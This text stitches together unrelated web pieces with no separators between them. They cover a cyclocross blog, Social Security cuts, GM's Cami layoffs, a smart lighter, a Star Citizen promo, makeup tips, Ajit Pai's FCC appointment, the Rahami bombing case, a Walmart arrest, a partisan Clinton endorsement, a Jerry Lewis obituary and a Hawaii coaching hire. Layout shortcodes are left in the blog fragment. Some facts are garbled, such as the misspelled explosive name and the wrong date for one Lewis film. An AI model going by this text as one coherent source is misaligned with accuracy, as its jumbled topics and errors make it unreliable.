And then there was the sprint at the elite men's sprint. I still don't know what to think. To me, the sprint two weeks ago in Gieten was ‘legit', I do think that Sven Nys didn't gift a win to Klaas Vantornout. [/one_half][one_half_last]I'm not so sure about today, it just looked weird but I simply can't imagine that the Sunweb-Revor team could pay enough for Nys to gift wins and Nys doesn't really need favours either. That being said, I'm just an outsider with relatively little insider knowledge – people more in the know said that this race wasn't all that important to Nys, so he didn't try THAT hard. It might be true but he never struck me as someone who just allows others to win, even less important races.
Tomorrow is another day and it's going to be one of my favourite races: the Druivencross in Overijse. The course is great, the surroundings are beautiful and the race has got plenty of history, so everybody will be mega motivated to win. Can't wait to see the day unfold. See you tomorrow.
NEW YORK ( MainStreet ) -- A large block of future retirees can expect to see their Social Security benefits dwindle by 19%, thanks to a 29-year-old piece of legislation that curtailed government retirement benefits. If the feds don't find other ways to shore up the pension system, it means bad news for millions of Americans under 50.
There's no doubt Social Security is in big trouble financially. According to the Congressional Budget Office , Social Security coffers are expected to run dry by 2037, and this year alone the U.S. government will collect $45 billion less in taxes than it shells out. By 2016, Social Security is expected to fall permanently into deficit mode, so it's no surprise future beneficiaries may see their Social Security cut.
With benefit cuts becoming the norm, the future looks bleak for millions of Americans under 50.
A new study by the National Academy of Social Insurance estimates that some cuts have already been locked in, thanks to changes in Social Security's payment structure that date back to the 1980s. Americans born after 1960 have been staring down the barrel of a 19% benefits cut, and that could just be the beginning. If Congress doesn't pare benefits across the board, the study argues, future Social Security beneficiaries could be in even bigger trouble
"Social Security benefits are already being cut more than many people realize," says Virginia Reno, NASI's vice president for income security. "Cutting benefits further is not necessary to preserve Social Security for future generations. Other alternatives merit consideration by policymakers."
That's what Congress did in 1983, and it must take similar action again, NASI says. Back then, Congress took steps to ensure the solvency of the nation's most widely used retirement savings program, raising the full-benefit retirement age from 65 to 67, a change that results in a 13.3% reduction in benefits, taxing part of benefit income, which results in a 5.1% benefit cut, and delaying the cost-of-living adjustment by six months, resulting in a permanent 1.4% cut.
Running at full tilt and loaded with workers, Cami Assembly in Ingersoll just slammed on the brakes.
One of Southwestern Ontario's hottest manufacturers in recent years, getting $560 million in government investment only two years ago and employing more than 3,000 people, the automaker stunned workers Friday with news it'll slash 625 jobs when it ships production of one vehicle to Mexico.
The fallout is expected to ripple beyond the automaker's payroll, affecting the region's large auto parts industry as well.
“It is a disaster — we are outraged. No one saw this coming,” said Jerry Dias, national president of the Unifor union that represent Cami workers.
Dias laid the blame for the cuts on the North American Free Trade Agreement, which opened borders tariff-free between Canada, the U.S. and Mexico.
The same trade deal has come under fire from newly elected U.S. President Donald Trump, who's called it the worst deal ever for his country.
Shocked workers only learned of the cuts early Friday, said Mike Van Boekel, chairperson of Unifor Local 88.
“I don't know why they are doing this. We are the No. 1 plant in North America, according to the Harbour Report. We are the most efficient and they are making record profits,” Van Boekel said of the award-winning factory.
“Our members are furious, they are pissed off. We have been working six days a week for eight years and now this. We have done everything they have asked of us. It is terrible.”
The layoff notices issued Friday take effect in July, the same month the company's owner, General Motors, moving production of about 100,000 Terrain vehicles from Cami to Mexico.
The plant also builds the Equinox sport utility vehicle.
But GM Canada says the layoffs aren't related to the Terrain moving to Mexico. Instead, it's the fact the 2017 production of the Equinox overlaps with new 2018 model production, said Jennifer Wright, GM Canada communications manager.
“It has nothing to do with the Terrain, or Mexico. The 2018 model is the next generation and there has been an overlap and that is now ending,” she said. GM Canada in 2015 announced an investment of $560 million in Cami to retool the plant for the new-look 2018 Equinox.
“We remain committed to Cami, we know it is an emotional day,” said Wright.
Workers stream out of the Cami plant in Ingersoll which has just been hit with a notice of permanent layoff of 600 workers by GM which is moving production of one of their vehicles to Mexico. The Cami plant produces the Equinox and the Terrain, photo was taken on Friday January 27, 2017. (MIKE HENSEN, The London Free Press)
Brendan Sweeney, an auto industry expert at McMaster University in Hamilton, said he believes making plants more efficient was the key to the decision.
While Cami was over-capacity — it had overflow Equinox vehicles assembled at GM's Oshawa plant — the Mexican plant was under-used and all the company's U.S. plants are full, he said.
“They have no capacity at plants in the U.S now, and this will make two plants near capacity,” he said.
“They could not really leave both at Ingersoll.”
This move will leave Cami at about 85 per cent capacity.
Sweeney downplayed suggestions Canada lost production, and not the U.S., due to American protectionist measures under Trump.
A move like this is planned months in advance, long before the recent presidential election, he added.
“Cami will not close, but it will be under-capacity,” he said.
It's also critical to remember that over the last five years automakers have increased their Ontario investment, with only GM reducing its footprint, said Sweeney.
“Ford, Toyota, Honda and FCA (Chrysler) have all increased investments. Three years ago, GM was the number one vehicle maker in Canada, and after this year it will be number four.”
Employment last year at vehicle assembly plants in Canada was up seven to eight per cent and at parts plants by four to five per cent.
“This news will scale that back, but it is the first bad news since 2015. We are still better off than 2015,” Sweeney said.
Cami's London-area suppliers include Brose, Qualtech Seating, Martinrea, Autoneum and London Automotive and Manufacturing.
“We are concerned about it, but we have a lot of different customers,” said Dave Kingston, account manager at London Automotive and Manufacturing.
“We are still very busy but we are not sure how this will impact us. It is too early to say.”
The impact of the job losses will be felt throughout Southwestern Ontario, since Cami buys from several suppliers, many in London, said Jim Reid, president of Unifor's Local 27, which represents workers at many parts makers.
“The loss of 600 good-paying jobs with benefits is an enormous loss to the London region. It is probably too early to say what the impact will be to the parts sector,” he added.
“Hopefully, both the federal and provincial governments can exert some pressure on GM to reverse their decision.”
The impact will also be felt in the small town of Ingersoll and its outlying rural areas, with less cash in the community for everything from real estate to shopping, said Michael Hennessey, former Ingersoll mayor.
“It will have a big impact — it will hurt us, no question. This is bad news,” he said.
Taking 600 paycheques out of an employer in a town of 13,000 will ripple into businesses like restaurants and stores, he said.
“But we are survivors, we will make it. It just might slow things down for a bit.”
Moving the Terrain will also end overflow production of the Equinox vehicle at GM Canada's Oshawa assembly plant. There are no layoffs there as a result.
The London Economic Development Corp. agreed the layoffs will ripple back here, given how much the automaker buys from suppliers in Southwestern Ontario.
“It is extremely unfortunate. It will have an impact in the region. It highlights the importance of a well diversified advanced manufacturing sector,” said Kapil Lakhotia, the LEDC's chief executive.
“In London, we are working to diversify manufacturing through aerospace, sporting goods and building products,” to name a few other sectors, he noted.
“We know there are suppliers here that do business with Cami and there are workers. There will be an impact.”
Unifor officials will meet with the company Monday to begin talks on mitigating the cuts. GM Canada will offer buyouts and retirement packages.
Cami began production of its new revamped Equinox Jan. 9.
Unifor has 2,800 workers now at the plant. Another 300 are in salaried jobs.
The company and union will begin talks later this year on a new collective agreement.
The Harbour Report measures plant production and efficiency.
— — —
What they said:
“While families are suffering the news of these job cuts, Premier Wynne is writing open letters about the strength of the auto industry in Ontario. Premier Wynne is clearly out of touch with the reality facing families in Southwestern Ontario, and needs to take concrete action now to begin protecting auto jobs in the province.”
— NDP MPP Catherine Fife (Kitchener-Waterloo)
“Life continues to get harder and more unaffordable under Kathleen Wynne's Liberal government. Taxes, fees and hydro bills continue to skyrocket, and the Wynne Liberals' cap-and-trade cash grab is yet another new burden on Ontario families and job creators. It's clear that Ontario is being left behind.”
— PC MPP Monte McNaughton (Lambton-Kent-Middlesex), the party's economic development critic
“When an announcement like this is made, it sends a shock wave through suppliers and the entire economy. We have been asking the government for months to focus on remaining competitive through innovation and reducing taxes and regulations.”
— Barrie-area Conservative MP Alex Nuttall, Barrie area MP, critic for Fed Dev Ontario and innovation
ndebono@postmedia.com
— — —
About Cami Assembly
— Created in 1986 in Ingersoll as a joint venture between General Motors and Suzuki Motor Corp.
— Plant production began April 1, 1989
— Builds the Chevy Equinox sport utility vehicle and GMC Terrain.
— Terrain production moving to Mexico in July.
— Now employs more than 3,000
— Recognized as the most efficient plant in North America four years in a row 2012, 2013, 2014 and 2015.,
— Won J.D. Power quality awards 2014-2016
The biggest disruption to come next will be with autonomous vehicles. Truck drivers, bus drivers, taxi, limo, delivery vehicles, even planes, trains and ships. The technology exists now, it is a matter of legislation and liability insurance. Different jurisdictions will surely adapt in different ways. Business owners will be driving the agenda but the capital costs will be large. Consumers might improve efficiency and productivity however being able to work or sleep en route. Car sharing schemes are proliferating undermining protected taxi regimes. Will the economy absorb these workers fast enough? Will there be political pressure for expanded safety nets? If you think technology through occupation by occupation I think we can be optimistic. Doctors for example wont be going anywhere as they regulate their own profession. They have the keys to the medicine chest and regulate their own numbers and practices. I cant see robots taking over most of the trades except maybe welding. It would be extremely expensive to make plumber and electrician robots. Perhaps in limited factory type settings like modular yards. And again that work is somewhat protected in North America. Im not sure if a company that wanted to use bipedal construction robots would be welcome by consumers or be given the legal right to do so. I cant even speculate on the effects on white collar corporate and government employees. They seem relatively safe in the short term at least. I dont think education or health care workers have too much worry. Natural resourses has seen huge technological change especially agriculture. But there are plenty of high paying jobs in energy extraction which will require manpower.
The smart LIGHTER that shames you into quitting smoking: £46 gadget tracks how many cigarettes you light up each day
The Quitbit was created by a pair of Boston-based designers
It resembles a Zippo and tracks the number of cigarettes an owner smokes
Each time it's used, it flags up how long it's been since the user last lit up
An app also tracks this data over longer periods and is used to set goals
Kickstarter prices begin at $79 (£46), but it will retail for $149 (£88)
Quitbit will be shipped next month and will be available globally
There are already devices that track your steps, weight and calories, but the latest gadget flips health tracking on its head by monitoring how many cigarettes you have.
Instead of encouraging people to smoke more, the smart lighter has been designed to shame them into quitting by revealing the true extent of their habit.
Called Quitbit, the device resembles a Zippo lighter and each time it's used, it records the number of cigarettes the user has had and how long it's been since they last lit up.
The Quitbit smart lighter, pictured, was created by a pair of Boston-based designers and resembles a Zippo lighter. Each time it is used, Quitbit tracks the number of cigarettes an owner smokes on a small LED, pictured, and will also flag up how long it's been since the user last lit up
THE QUITBIT SPECIFICATIONS
Size: 2.6in x 1.6in x 0.4in (67 x 43 x 10 mm) Battery: Rechargeable Lithium Polymer; lasts one week, or a pack a day Weight: 72g Connectivity: Bluetooth Low Energy (4.0) Compatibility: iOS 5 and later and Android 4.3 and later Prices: Kickstarter prices begin at $79 (£46), but Quitbit is expected to retail for $149 (£88) when it goes on sale in June
A companion app will also track this data over longer periods of time, and can be used to set goals.
This app can also reveal how much money has been spent on cigarettes, or subsequently saved by cutting back, and helps smokers learn at what times during the day they are smoking the most.
Progress can then be shared with Quitbit's community or with friends on Facebook and Twitter.
Quitbit was created by Boston-based designer Ata Ghofrani.
It lights cigarettes using a heating element, similar to car lighters, and the electronics count each cigarette that is lit.
The lighter will also flag up how long it's been since the user last lit up, pictured. Quitbit lights cigarettes using a heating element, similar to car lighters. The developers claim the Quitbit will only track the user's smoking, meaning flicking the lighter or sharing it with friends won't impact the tracking
A small LED display on the front of the Quitbit shows the number of cigarettes, and the duration since the last cigarette.
Ghofrani said he developed the Quitbit to only track the owner's smoking, meaning flicking the lighter or sharing it with friends won't impact the tracking.
He did not explain how the device does this, however.
The lighter can also be put on a timer, or programmed to work for set periods to help smokers cut back during the day, for example.
Quitbit, pictured, uses Bluetooth and is compatible with iPhone 4S, 5, 5S and Android 4.3 and above. Its rechargeable Lithium Polymer battery lasts one week, or a pack a day
A companion app, pictured, also tracks smoking data over longer periods of time and can be used to set goals, pictured left. The lighter can additionally be put on a timer, or programmed to work for set periods, via the app, pictured right, to help smokers cut back during the day, for example
Quitbit uses Bluetooth and is compatible with iPhone 4S, 5, 5S and Android 4.3 and above.
The Quitbit team was founded by Ghofrani and Kuji Nakano.
The pair said: ‘[We] had the idea behind Quitbit when Ghofrani was trying to quit smoking last year.
‘When smoking before class, Nakano asked Ghofrani how much he smoked that day.
‘When he wasn't sure [we] started to track their smoking and became frustrated with the existing ways to learn about their smoking habits.'
Greeting Citizens!
Vehicle enthusiasts know the name Tumbril. Formed in 2536, the company designed some of the earliest ground-based vehicles for the UPE Army. For centuries, it was a trusted name in dependable, off-road vehicles and HOVs. Although the company was forced to close down in 2862, the reputation of these vehicles lived on.
Now, Tumbril is back.
After carefully considering all the varied and exciting systems in the UEE, Tumbril has chosen Stanton system to extend a special invitation to active pilots around Crusader to pre-purchase this exciting new all-terrain vehicle.
For a limited time in this inaugural sale, Tumbril will be releasing a special edition of the Cyclone called the Dust Devil. Featuring a non-reflective matte black paint, the Dust Devil is perfect for land-based operations that require speed and discretion.
We know that your business is your life, so having dependable and reliable vehicles at your disposal can be the difference between a payday and a blown contract. That's why we'd like you to consider the Cyclone or one of its dynamic module variants as an addition to your business.
The UEE Department of Transportation & Navigation
With the unveiling of the new Cyclone, Tumbril wanted to remind you that some businesses require a Class-G license to operate vehicles like the Cyclone. To that end, Tumbril has teamed up with the Department of Transportation and Navigation to provide a direct link to the appropriate written exam to get you rolling.
About the Pre-Sale
The Tumbril Cyclone pre-sale will run through July 20. Pre-sale Cyclones include a limited edition Tumbril Stock forum badge and limited skin which will not be available with the standard model. Credit models (including the four role-specific variants) and additional multi-ship packs will be available in the full sale, as will a brochure, holoviewer model, and additional concept material. CCUs from the base Cyclone to the variants will also be available tomorrow.
Once you know the best techniques for applying eye makeup, the next challenge comes in determining the best shades for your eye color, skin tone and overall coloring. For those blue eyed girls among us, here are a few eye makeup shade selection tips:
First off, always remember this little rule. Colors are complimented best by shades that are opposite from them on the color wheel. For instance, blues and violets are complimented well by yellows and oranges. With eye makeup for blue eyes, this doesn't mean you need to bust out bright orange or yellow eyeshadow, however. It does mean that you incorporate those shades into your choices of color families. The yellow and orange color families in the eye makeup world include a whole slew of colors including gorgeous golds, bronzes, peaches and tans. Eyeshadow shades from these colors families will help make blue eyes stand out. If you have bluish-violet eyes, try a nice gold shade, like Goldmine powder eyeshadow from MAC. If you have more of a greyish blue eye, try a bronze color such as MAC's powder eyeshadow in Amber Lights. As a general rule, chocolate brown, beige, bronze and gold will work very well for blue eyes.
photo credit: Gl00P
You'll also want to take your skin's undertone into account. For example, let's say you're considering trying a light brown eyeshadow shade. If your skin is on the cooler side, choose a cooler version of brown like MAC's powder eyeshadow in Era. If you have warmer skin, you can pull off a warmer version of brown, such as MAC's powder eyeshadow in Soba. Soba and Era are very close in color depth, but Soba is a warmer version than the other. If you have very light skin or very dark skin, you will probably be looking for a very dark chocolate brown or a very light beige shade as opposed to just a light brown. You should start with the basic general shade based on your eye color and skin depth, and then try to find a version of that color that compliments your overall warm or cool undertone.
You can also experiment with various shades of eyeshadow for blue eyes by visiting a makeup counter. This will give you the chance to try dozens of shades and get eye makeup tips for blue eyes in person based on your individual eye shade and coloring.
Stay tuned! We have eye makeup tips coming for green eyes, brown eyes and hazel eyes! xo
Image: Energy Commerce/Flickr
Not so fast Ajit.
Public interest groups, political organizers and free speech advocates expressed anger and alarm on Monday about President Trump's decision to elevate Ajit Pai, a right-wing opponent of net neutrality, to lead the Federal Communications Commission.
Pai, a 44-year-old Republican and former Verizon lawyer who has served as a FCC commissioner since 2012, has repeatedly opposed the agency's recent pro-consumer free speech reforms. Last month, Pai vowed to take a "weed whacker" to the FCC's policy protecting net neutrality, the principle that all internet content should be equally accessible to consumers.
"Ajit Pai has been on the wrong side of just about every major issue that has come before the FCC during his tenure," Craig Aaron, President and CEO of DC-based public interest group Free Press, said in a statement. "Pai has been an effective obstructionist who has always been eager to push out what the new presidential administration might call alternative facts in defense of the corporate interests he used to represent in the private sector."
In addition to net neutrality, Pai has opposed FCC initiatives to advance broadband privacy protections, to increase competition in the cable "set-top box" market, and to make it easier for local municipalities to develop affordable, high-speed public broadband networks. He's also been a vocal booster for telecom industry consolidation—Pai actually voted against the Charter-Time Warner Cable merger because he considered the FCC's conditions too onerous.
"Throughout his tenure at the FCC, Commissioner Pai has been a steadfast opponent of net neutrality and consumer privacy rules, and a rubber stamp for mega-mergers," Sarah Morris, director of open internet policy for New America's Open Technology Institute, said in a statement. "His anti-regulatory agenda is a gift to telecom lobbyists and a major threat to consumers, small businesses, and the American economy."
Not surprisingly, Pai's appointment as FCC chairman was enthusiastically praised by the nation's largest cable and phone companies, and the DC-based lobbying groups that represent them.
"We will protect our right to communicate, through policy when we need to, in the street if we have to."
Pai has also objected to FCC efforts to rein in exploitative prison phone costs, and to help low-income people afford internet access by updating the Reagan-era Lifeline program to include broadband service. That's very concerning to Malkia Cyril, co-founder and executive director of the Center for Media Justice, a nonprofit group that advocates for digital freedom and inclusion.
"Pai has consistently opposed efforts to keep incarcerated people and their families connected through affordable calls, even though those calls have been proven to reduce recidivism," Cyril told Motherboard. "He has opposed Lifeline rules that ensure modern communications for poor families through affordable broadband, and every other rule that protects the public interest."
"The media rights and reforms we've won that close racial and economic gaps are threatened by this appointment," Cyril added. "Luckily, as the marches of the last few days, months and years show: we will protect our right to communicate, through policy when we need to, in the street if we have to."
Political organizers and activists are particularly alarmed about the threat to net neutrality, according to Winnie Wong, a co-author of the Women's March on Washington unity principles, because net neutrality ensures that the internet remains an open platform for networking and movement-building.
"Net neutrality has become one of our single greatest assets as organizers," Wong told Motherboard. "Now that it's at risk, every single organizer and activist needs to view protecting net neutrality as a primary fight under the Trump regime. We need to build a strong coalition to protect and defend a free and open internet, because so much is at stake."
"The internet is a network of networks," said Wong. "The way we oppose an attack against a network of networks is through a movement of movements."
Political organizers already realize that net neutrality—the freedom to connect—has exponentially expanded the possibilities for online organizing in the internet era, Wong said. That's why net neutrality is essential for modern political movements to build bridges and form alliances across discrete issues and ideological boundaries. Net neutrality ensures an open, distributed platform.
Pai and his Republican colleague Mike O'Rielly now hold a majority at the nation's top telecom regulatory agency, following the departure of former FCC Chairman Tom Wheeler and his Democratic colleague Jessica Rosenworcel earlier this month.
In a statement, Gene Kimmelman, President and CEO at DC-based digital rights group Public Knowledge urged Pai to "preserve consumer protections and to focus on driving down prices and expanding choices for all essential communications services while preserving the Commission's recent pro-competitive and consumer protection rules and actions."
That may be wishful thinking. Both Pai and O'Rielly have made no secret of their desire to dismantle the FCC's net neutrality rules, which they have characterized as an egregious example of regulatory overreach, as well as FCC policies protecting consumer privacy and expanding broadband access in poor communities
"I'm optimistic that last month's election will prove to be an inflection point—and that during the Trump Administration, we will shift from playing defense at the FCC to going on offense," Pai said last month during a speech at the Free State Foundation, a right-wing think-tank.
Open internet advocates fear that "going on offense" will mean efforts by Pai, and his GOP allies in Congress, to roll back the pro-consumer FCC reforms of the last three years. Pai is likely to find a willing partner in Rep. Marsha Blackburn, the arch-conservative Tennessee Republican and recipient of mountains of telecom industry campaign cash, who was recently named as chairman of the powerful House telecom subcommittee.
Open internet advocates say that the FCC's net neutrality safeguards are necessary to prevent broadband giants like Comcast, AT&T, and Verizon from favoring their own services at the expense of rivals, or creating online fast lanes for deep-pocketed content companies. Broadband industry lobbyists say the rules have stifled investment, but public interest advocates dispute that assertion.
Andrew Schwartzman, a veteran public interest lawyer now affiliated with Georgetown University Law Center's Institute for Public Representation, said that Pai will be a "formidable opponent."
It's not hard to see why. Pai, who holds degrees from Harvard and the University of Chicago, is considered by friends and foes alike to be extremely knowledgeable about telecom law and policy. He's clerked for a federal judge, served as a senior staffer for two US senators, and worked as a senior attorney at the Justice Dept. Prior to becoming a FCC commissioner, Pai spent four years working in the FCC general counsel's office.
"He is not only an outspoken detractor from many of the important advances we obtained under Chairman Wheeler, but he is also extremely smart and knowledgeable," said Georgetown's Schwartzman, who added that Pai's promotion is a "smart move, because making him permanent chair will accelerate the process of trying to turn things around."
In the short term, Pai's appointment to lead the FCC will not need to be approved by the US Senate, because he's already been confirmed as a FCC commissioner. He will, however, need to be reconfirmed by lawmakers for another term later this year. Judging by the public interest community's reaction to Pai's appointment, that process will be lively, to say the least.
Police Arrest Suspect Ahmad Khan Rahami Over Bombs In New York Area
Updated at 10 p.m. ET with probe details
The suspect in the New York and New Jersey bombings has not been cooperating with police, according to law enforcement sources interviewed by NPR's Dina Temple-Raston.
Prosecutors in Union County, N.J., say Ahmad Khan Rahami has been charged with five counts of attempted murder of a law enforcement officer, along with two weapons crimes. His bail has been set at $5.2 million. The charges relate to a shootout during his arrest.
The sources say a note was found in a plastic bag which was covering one of the devices being examined, a failed pressure cooker bomb, and the note mentioned a number of terrorist events, including the Boston Marathon attack. Dina reports that authorities are studying whether Rahami tried to copy that bombing, which also used devices made with pressure cookers.
Enlarge this image toggle caption FBI FBI
She reports that Rahami had some similarities to Tamerlan Tsarnaev, one of the Boston bombers. They both had financial problems in the U.S., traveled back to the home country — in Rahami's case, Afghanistan — and had problems with the law.
The sources say among the evidence that led police to Rahami were a fingerprint on the unexploded bomb, and a cell phone that was linked to his father.
Investigators tell Dina that they are looking at Rahami's foreign travel because the bombs used an explosive made from Hexamethylene triperoide, which suggests he may have had training or practice.
Authorities say he traveled to Afghanistan in 2011 and 2013, and was in Quetta, Pakistan, in 2013, which is the base for the Pakistani Taliban.
Our original post:
Law enforcement agencies have apprehended New Jersey resident Ahmad Khan Rahami, after a brief but intense manhunt by agencies seeking to question him about multiple bombs in New York and New Jersey since Saturday. No one was killed in the blasts, but 29 people were injured.
Rahami, 28, was captured after a gun battle with police in Linden, N.J.; images shown on local TV shortly before noon Monday showed Rahami on a stretcher with what looks to be a wound on his upper arm or shoulder, with his hands behind his back.
Chris Bollwage, the mayor of Elizabeth, N.J., said on CNN that the suspect was apprehended and taken away by an ambulance after being injured in a shootout with police. Elizabeth is just northeast of Linden and is the site of Rahami's last known address.
Linden Mayor Derek Armstead said that a local bar owner called police because he found a man sleeping in the hallway of his bar.
"One of our police officers went to investigate and to wake him up and realized that he was the suspect that was being sought in the other bombings that had occurred prior," Armstead told reporters.
The man, who turned out to be Rahami, fired on the police officer who was wearing a bullet-proof vest, said Armstead. Two officers were injured during the confrontation.
During a press conference, New York Mayor Bill de Blasio said authorities have "every reason to believe that this was an act of terror."
William Sweeney, the assistant director in charge of the FBI's New York field office, said they were not looking for any more suspects in the case and that they had "no indication" that a terror cell was operating in New York City.
De Blasio said that New Yorkers, however, should remain vigilant.
Authorities believe Rahami is the sole suspect in Saturday night's explosion on West 23rd Street in Manhattan's Chelsea neighborhood and an explosion earlier that day at Seaside Park, N.J.
Sweeney would only say that they connected those two explosions through "evidence and analysis."
Investigators searched several homes in New Jersey early Monday. Two law enforcement officials told NPR's Dina Temple-Raston that a cellphone attached to an explosive device that did not detonate initially led them to the suspect's father, which then led them to Rahami.
Rahami is a U.S. citizen who was born in Afghanistan on Jan. 23, 1988, a bulletin issued by the FBI stated, adding that "He is about 5' 6" tall and weighs approximately 200 pounds. Rahami has brown hair, brown eyes, and brown facial hair."
"The investigation is moving rapidly," President Obama said Monday during a news conference in New York, where he is attending this week's U.N. General Assembly. He added that law enforcement officials so far see no connection between the bombs and a stabbing spree this weekend at a Minnesota mall.
"We all have a role to play as citizens in making sure we don't succumb to that fear. And there's no better example of that than the people of New York and New Jersey," the president said.
Authorities said little about what they knew about Rahami. Sweeney said they had received information that he was involved in some kind of domestic dispute, but he also said that Rahami was not presently on the FBI's radar.
NPR has learned that in 2011, Rahami's father and other family members filed a lawsuit against the city of Elizabeth, its police department and other defendants, accusing them of harassment that targeted their business, a restaurant called First American Fried Chicken. The treatment was inspired by the plaintiffs' religion, national origin and race, the plaintiffs say in court documents.
The complaint was filed in district court in Newark; it remains unresolved.
Many developments have emerged since Saturday's explosion in Manhattan, which occurred around 8:30 p.m. ET. Here's a brief recap of where things stand, with the most recent events listed first:
Monday morning: De Blasio and police officials call for help in locating Rahami. New York restores subway service in all Chelsea stations.
FBI agents search a residence in Elizabeth, N.J., above a restaurant.
Sunday night: At a train station in Elizabeth, N.J., FBI technicians working on one of five bombs in a backpack that was initially discovered in a trash can detonate the bomb. No injuries are reported.
FBI agents stopped "a vehicle of interest" in Brooklyn in connection to the Manhattan explosion, the AP reports, citing FBI spokeswoman Kelly Langmesser. The AP says five people were in the car.
Sunday morning: All 29 of the people who were injured in Saturday night's blast in Chelsea have left hospitals. Officials also say the blast did not cause any structural damage.
Saturday around 8:30 p.m.: An explosion hits New York City's Chelsea neighborhood on West 23rd Street. Just blocks away, another bomb is found — and it's similar to the first. As the Two-Way reported, "Both were pressure cookers and Christmas lights were used to spark the explosives. A flip phone appeared to serve as the timer for both devices. Both pressure cookers were filled with ball bearings and BBs to serve as shrapnel."
Saturday morning: An explosion hits a trash can in Seaside Park, N.J., around 10 a.m., forcing officials to cancel a benefit run that had been planned to help members of the military and their families.
This is a breaking news story. As often happens in situations like these, some information reported early may turn out to be inaccurate. We'll move quickly to correct the record and we'll only point to the best information we have at the time.
Jennifer Peckham is accused of huffing a canister of dust cleaner at a South Austin Walmart. (Image credit: Austin Police Department)
A woman was arrested at a South Austin Walmart Tuesday after she ate a cake in the store without paying for it -- and huffing a canister of dust cleaner, police say.
According to the arrest affidavit, Jennifer Peckham, 40, is charged with inhalant abuse, a Class B misdemeanor.
It happened at the Walmart located at 710 E. Ben White Blvd.
Court documents say Peckham took a cake from the bakery and went to the book/literature section of the store, where she then began to eat it. She then took a can of 'Dust Off' dust cleaner and started huffing it multiple times.
A Walmart loss prevention employee confronted her, and that's when she took the cake and dust cleaner to the store's bathroom where she was taken into custody when police arrived, the affidavit says.
When questioned by officers, Peckham admitted the items belonged to Walmart, court documents say. The total value of the items were $25.95.
1 SHARES Facebook Twitter Google Whatsapp Pinterest Print Mail Flipboard
A Texas newspaper hasn't just endorsed Hillary Clinton. The Corpus Christi Caller-Times destroyed the media created myth that Hillary Clinton and Donald Trump are equals, but that Clinton is the lesser of two evils.
In their endorsement the editorial board of the Caller-Times wrote:
She is not, as has been sold, a mere lesser of two evils. Her experience and intellect would make her a standout in any group of candidates. Like President Obama said and didn't need to be fact-checked, she's more qualified than him or her husband.
….
Being the only serious alternative is both Clinton's fortune and misfortune. It increases the likelihood of victory, but also of presiding over a nation with large groups of dissidents. While voting against her can be a statement of differing principle, voting for Trump would not rise to that level. It's not a vote for Republicanism. The Republican Party's principles and standards are beyond Trump's reach.
….
We perceive in Clinton the capability to bridge the divide — to define rather than exploit our problems and pursue intelligent solutions. Her “basket of deplorables” comment made the task more difficult but it was a rare lapse by an otherwise level-headed servant leader with a history of self-correcting resilience. The former senator's Republican colleagues remember her fondly as a middle-ground-seeking master of the art of deal-making. If there is to be a return to bipartisanship, she is the one to lead it.
It is rare to see an endorsement in this presidential election that focuses on why one candidate should be president instead of why her opponent is unfit to hold the office.
Hillary Clinton is not the lesser of two evils. She has never been. When one examines the facts, there is no contest between Clinton and Trump. Donald Trump has a real rap sheet that should disqualify him from being president. Hillary Clinton's “crimes” are conspiracy theories that have been cooked up by the conservative media's anti-Clinton conspiracy cottage industry that has spent decades as a robust source of profit for conservative authors and media.
The idea that Hillary Clinton is the lesser of two evils is a lazy media narrative that was created by corporate mainstream talking heads only interested in false equivalence to keep ratings and interest up during an election. It would take too much effort for the media to discuss the fact that Clinton's approval ratings are a byproduct of decades of Republican attacks on her last name combined with the extreme polarization of the electorate.
2016 isn't a lesser of two evils election. It is a base election that may turn into a rout because Republicans made the foolish decision to nominate a candidate with a closet full of evils to run against the most competent and qualified candidate to a major party's nomination in the modern era of American politics.
If you're ready to read more from the unbossed and unbought Politicus team, sign up for our newsletter here! Email address: Leave this field empty if you're human:
Veteran American entertainer Jerry Lewis, whose goofy brand of physical comedy endeared him to millions in a career spanning six decades, died on Sunday aged 91, his agent told AFP.
One of the most popular comic actors of the 1950s and '60s, Lewis perfected the role of the quirky clown in slapstick comedies like “The Nutty Professor” but also won acclaim as a writer, actor and philanthropist.
“Very sadly Jerry Lewis has passed,” his agent Jeff Wijtas told AFP. Variety reported that the comic legend died in Las Vegas early Sunday morning.
Honored with accolades at home and abroad, including a nomination for the Nobel Peace Prize in 1977, Lewis became known as much for his tireless efforts to promote awareness of Muscular Dystrophy as for his unique brand of physical comedy.
Over the course of 45 years, he raised some 2.45 billion dollars for combatting the disease with an annual television event.
Born Joseph Levitch in Newark, New Jersey to two New York City entertainers, Lewis first took center stage at the tender age of five, when he performed “Brother, Can You Spare a Dime?” He began playing at resorts outside New York City that catered to Jewish patrons, known by touring entertainers as the Borscht Circuit.
By age 15, he had assembled his own routine of comedic lipsynching and made the rounds of New York talent agents, although only a burlesque house in Buffalo was interested.
At the age of 20, however, everything changed for Lewis, when he embarked on arguably one of the most successful entertainment partnerships of all time with smooth crooner Dean Martin.
The two fed off each other in now-classic comedy gags, including pratfalls, slapstick and lots of seltzer water. They signed a long-term contract with Paramount Pictures, and starred in 1949's “My Friend Irma,” where Lewis delivered a performance described as “the funniest thing in the picture.”
– ‘Finish what I started' –
Other notable films in Lewis' repertoire include “It's a Mad, Mad, Mad, Mad World” (1959), “The Geisha Boy” (1958) and “Funnybones” (1984).
His box office grosses, spanning nearly 50 years, total 800 million dollars — an impressive figure since movie tickets cost no more than 50 cents during the height of his popularity.
After 17 films together, the Lewis-Martin partnership split in 1956, but Lewis continued his career in comedy and Hollywood. He won acclaim for his dramatic role in the 1983 Martin Scorsese film “The King of Comedy,” co-starring with Robert De Niro that showed his acting versatility.
In recent decades, Lewis had been plagued by health problems, and was declared clinically dead in 1982 after a heart attack. Ten years later he was diagnosed with prostate cancer and in 1997 found out he had diabetes. A diagnosis of spinal meningitis in 2000 further caused his health to deteriorate.
But he was determined not to let ill health keep him from working as long as possible, including on a Broadway musical adaptation of “The Nutty Professor” as recently as 2011.
“I have to finish what I've started,” he told the Los Angeles Times in a 2010 interview. “I want to do it before I leave.”
Nevada offensive coordinator and quarterbacks coach Nick Rolovich is Hawaii's new head coach, according to a source. Hawaii later confirmed the hiring.
Rolovich takes over for Norm Chow, who was fired in early November. The Rainbow Warriors are 2–10 this season, including an 0-8 mark in Mountain West Conference play.
The hiring marks a return for Rolovich to Hawaii, where he served as an assistant from 2008-11. He spent the first two years as the quarterbacks coach before taking on offensive coordinator duties as well. Rolovich served as Nevada's offensive coordinator and quarterbacks coach from '12-15.
